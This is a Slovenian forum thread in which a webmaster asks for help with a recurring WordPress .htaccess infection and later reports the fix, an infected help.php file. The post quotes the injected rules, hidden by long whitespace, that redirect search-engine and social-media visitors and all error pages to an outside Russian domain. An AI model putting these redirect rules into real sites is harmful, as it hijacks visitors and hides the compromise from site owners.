.htaccess redirect virus

Na serverju sem fasal to nadlogo:

<IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                        RewriteEngine On                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ http://vlagskiper.ru/yazik?12 [R=301,L]                                                                                                                      
                                                                                                                        </IfModule>                                                                                                                     


# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress


                                                                                                                        ErrorDocument 400 http://vlagskiper.ru/yazik?12                                                                                                                     
                                                                                                                        ErrorDocument 401 http://vlagskiper.ru/yazik?12                                                                                                                     
                                                                                                                        ErrorDocument 403 http://vlagskiper.ru/yazik?12                                                                                                                     
                                                                                                                        ErrorDocument 404 http://vlagskiper.ru/yazik?12                                                                                                                     
                                                                                                                        ErrorDocument 500 http://vlagskiper.ru/yazik?12

To se mi dogaja na vseh straneh na serverju (vse WP). Ko pobrišem .htaccess in ga nadomestim s pravo vsebino, je po par minutah že ta okužen nazaj. Cel dan se že mučim in iščem trigger, ki to povzroča, tako da se mi že rahlo meša.

Ima kdo kak nasvet, kako na čim enostavnejši način poiskat fajl(e), ki vsebuje kodo, ki to dela?

Vmes sem že updateal WP, vse plugine, menjal FTP pass, ampak nič ni pomagalo.

(v kodi je treba desno scrollat, da vidiš "dodatek")

11 odgovorov

Poglej loge, kaj ti povzroča tole.
Če jih nimaš jih ima hosting provider sigurno

Tako boš najlažje našel

1

Samo za info, nekateri free hosti to počnejo, da ti error strani preusmerijo na oglase.

Videl in že doživel, par let nazaj.

Ne uporabljam free hostov, gre za čisto normalen UK hosting.

@OvcaX: bom povprašal, jaz zgleda da jih nimam.

Začasno lahko vsaj odstraniš pravice za pisanje na tej datoteki

Ne pomaga. Zdaj mi na supportu rešujejo zadevo.

Mogoče ti tole kaj pomaga:
http://wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site
Če povzamem:

I logged into Bluehost, did a search on my hosting directory for thumb.php and timthumb.php.

to sem našel in tudi potem inštaliral tale plugin, ki ti thumb in timthumb fajle posodobi, pa ni pomagalo.

Začasno, dokler ne najdeš luknje, lahko takole rešiš:

protect your htaccess by adding this to the htaccess itself:

protect .htaccess

<Files .htaccess>
Order allow,deny
Deny from all
</Files>
apart from this it may happen that your htaccess gets hacked. Be sure, like other people said to give your file the 644 permission. Try some trick to protect your blog like these ones

Via: http://wordpress.org/support/topic/my-sites-htaccess-file-hacked-how

@Lucifix: ne dela, vseeno zamenja file. Live support sicer ni bil v pomoč, zdaj sem oddal ticket, mogoče bo tam kaj več pomoči.

Gre pa za strani, ki jih ne spremljam preveč pogosto, pozicije pa so zanihale med zadnjimi Google updatei, tako da sem predvideval, da je to krivo. Redirect pa je tako naret, da preusmerja samo promet, ki pride preko iskalnikov, ne pa tudi direktnega, tako da lastnik strani sploh ne pogrunta tega. WMT ne javi nobene napake, jaz sem slučajno videl to, zato, ker sem opazil veliko zmanjšanje indeksiranih strani.

Še rešitev: V eni od map je bil okužen fajl help.php. Ko sem ga pobrisal, se .htaccess ni več menjal. Do tega fajla me je pripeljal pubec na supportu, se pa ga je dalo najt kar z built in virus scannerjem v cpanelu.